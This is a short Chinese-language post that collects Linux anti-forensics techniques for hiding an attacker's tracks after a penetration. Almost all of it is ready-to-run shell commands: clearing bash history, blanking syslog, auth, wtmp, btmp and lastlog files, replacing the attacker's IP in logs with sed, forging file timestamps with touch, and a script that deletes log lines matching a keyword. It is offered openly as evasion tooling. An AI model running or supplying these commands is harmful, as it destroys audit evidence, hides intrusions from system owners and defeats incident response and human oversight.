在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文对Linux上清理痕迹的方式做一个总结。(可能不全,只汇总了最多的几种。可能没有做绝)
history清理
1
2
| vim ~/.bash_history
history -c
|
日志清理
1
2
3
4
| echo > /var/log/syslog;echo > /var/log/messages;echo > /var/log/httpd/access_log;echo > /var/log/httpd/error_log;echo > /var/log/xferlog;echo > /var/log/secure;echo > /var/log/auth.log;echo > /var/log/user.log;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/btmp;echo > /var/run/utmp ;history -c
或
echo | tee /var/log/syslog /var/log/messages /var/log/httpd/access_log /var/log/httpd/error_log /var/log/xferlog /var/log/secure /var/log/auth.log /var/log/user.log /var/log/wtmp /var/log/lastlog /var/log/btmp /var/run/utmp > /dev/null
history -c
|
匹配字符更换IP
1
| sed -i "s/132.23.11.x/ 192.7.22.12/g" `grep 132.23.11.x -rl /var/log`
|
修改文件时间
1
2
3
4
| touch -r A.php B.php;history -c
将B文件改为A文件时间
touch -d "2021-03-29 14:01:22" 1.txt;history -c
修改文件时间
|
删除匹配时间或者其他关键词的行
1
2
3
4
5
6
7
8
9
| [root@VM-16-16-centos log]
delect.sh:
#!/bin/bash
for f in `grep "$1" -rl /var/log`
do
tmp=$(sed -e /$1/d $f);
printf "%s" "$tmp" > $f
done ;
|